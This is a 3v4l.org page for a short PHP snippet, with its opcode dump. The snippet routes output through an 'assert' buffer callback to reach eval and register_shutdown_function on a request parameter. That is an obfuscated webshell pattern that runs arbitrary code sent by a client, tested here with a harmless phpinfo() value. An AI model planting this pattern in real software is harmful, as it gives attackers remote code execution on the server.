3v4l.org

run code in 300+ PHP versions simultaneously
<?php $_REQUEST['e'] = 'phpinfo()'; ob_start('assert'); echo 'eval(\'register_shutdown_function(\'assert\',$_REQUEST[\'e\']);\')'; ob_get_flush();
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/0JSA5
function name:  (null)
number of ops:  10
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   FETCH_W                      global              $0      '_REQUEST'
          1        ASSIGN_DIM                                               $0, 'e'
          2        OP_DATA                                                  'phpinfo%28%29'
    4     3        INIT_FCALL                                               'ob_start'
          4        SEND_VAL                                                 'assert'
          5        DO_ICALL                                                 
    5     6        ECHO                                                     'eval%28%27register_shutdown_function%28%27assert%27%2C%24_REQUEST%5B%27e%27%5D%29%3B%27%29'
    6     7        INIT_FCALL                                               'ob_get_flush'
          8        DO_ICALL                                                 
          9      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
149.85 ms | 1394 KiB | 17 Q